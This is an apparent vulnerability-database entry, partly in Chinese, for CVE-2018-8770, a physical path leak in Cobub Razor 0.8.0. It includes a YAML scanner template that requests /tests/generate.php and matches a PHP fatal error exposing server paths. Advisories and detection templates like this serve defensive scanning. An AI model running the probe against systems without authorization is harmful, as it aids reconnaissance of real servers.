CVE-2018-8770: Cobub Razor 0.8.0 Physical path Leakage Vulnerability

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Cobub Razor 0.8.0 Physical path Leakage Vulnerability

PoC代码[已公开]

id: CVE-2018-8770

info:
  name: Cobub Razor 0.8.0 Physical path Leakage Vulnerability
  author: we1x4n
  severity: medium
  description: |-
    Cobub Razor 0.8.0 Physical path Leakage Vulnerability
  reference:
    - https://www.tenable.com/security/research/tra-2018-23
    - https://nvd.nist.gov/vuln/detail/CVE-2018-8770
  tags: cve,cve2018,cobub,razor,discosure
  created: 2023/08/10

rules:
  r0:
    request:
      method: GET
      path: /tests/generate.php
    expression: 'response.status == 200 && response.body.bcontains(b"Fatal error: Class ''PHPUnit_Framework_TestCase'' not found in ") && response.body.bcontains(b"/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line")'
expression: r0()